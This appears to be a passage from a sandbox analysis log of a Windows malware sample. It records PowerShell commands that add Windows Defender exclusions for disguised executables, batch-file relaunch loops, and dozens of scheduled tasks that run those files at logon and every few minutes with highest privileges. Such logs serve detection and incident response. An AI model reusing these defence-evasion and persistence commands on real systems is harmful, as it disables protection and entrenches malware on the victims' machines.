        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\taskhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\it-IT\WmiPrvSE.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Analysis Services\Idle.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sppsvc.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\dllhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\MSBuild\Microsoft\lsass.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\MF\dllhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\smss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Local Settings\csrss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1f4ba082-69f6-11ef-a143-62cb582c238c\wininit.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ja-JP\smss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Package Cache\taskhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\explorer.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\taskhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\taskhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2264
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EGpQDozYXV.bat"
        7⤵
        
        PID:2972
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:2740
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1724
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OMb46N11BK.bat"
        9⤵
        
        PID:2772
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        10⤵
        
        PID:2260
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe"
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1420
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dgWvFyiHB2.bat"
        11⤵
        
        PID:2024
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        12⤵
        
        PID:2856
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe"
        12⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:568
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6SU00hIhBO.bat"
        13⤵
        
        PID:2648
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        14⤵
        
        PID:1152
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe"
        14⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2256
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\O1BWw2qr2X.bat"
        15⤵
        
        PID:2072
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        16⤵
        
        PID:1960
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe"
        16⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1796
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yWf31kVUUl.bat"
        17⤵
        
        PID:2572
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        18⤵
        
        PID:2796
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe"
        18⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YzNOjOTGFC.bat"
        19⤵
        
        PID:1456
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        20⤵
        
        PID:2036
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe"
        20⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2188
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UJpHfzfs2i.bat"
        21⤵
        
        PID:2824
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        22⤵
        
        PID:1944
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe"
        22⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1532
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OyPKZ08zKl.bat"
        23⤵
        
        PID:3056
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        24⤵
        
        PID:832
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe"
        24⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2616
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\msQYHxuKnC.bat"
        25⤵
        
        PID:1672
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        26⤵
        
        PID:3040
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\taskhost.exe"
        26⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Microsoft Help\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft Help\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft Help\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\NetHood\audiodg.exe'" /f
1⤵
- Process spawned unexpected child process
PID:2636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\Admin\NetHood\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\NetHood\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 13 /tr "'C:\Windows\fr-FR\lsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\fr-FR\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\Windows\fr-FR\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Common Files\System\msadc\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\System\msadc\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\System\msadc\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\providercommon\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\providercommon\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\providercommon\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\providercommon\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\providercommon\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\providercommon\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Portable Devices\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Photo Viewer\es-ES\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\es-ES\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\es-ES\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Desktop\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
PID:2600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default\Desktop\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Desktop\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Recovery\1f4ba082-69f6-11ef-a143-62cb582c238c\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\1f4ba082-69f6-11ef-a143-62cb582c238c\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Recovery\1f4ba082-69f6-11ef-a143-62cb582c238c\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\My Documents\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Admin\My Documents\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\My Documents\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 9 /tr "'C:\providercommon\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
PID:2864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\providercommon\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\providercommon\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Windows\it-IT\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\it-IT\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\it-IT\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Analysis Services\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Analysis Services\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Analysis Services\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\providercommon\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\providercommon\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\providercommon\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
PID:3036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Microsoft\MF\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\MF\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Microsoft\MF\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\smss.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\smss.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:1700

C:\Windows\system32\schtasks.exe
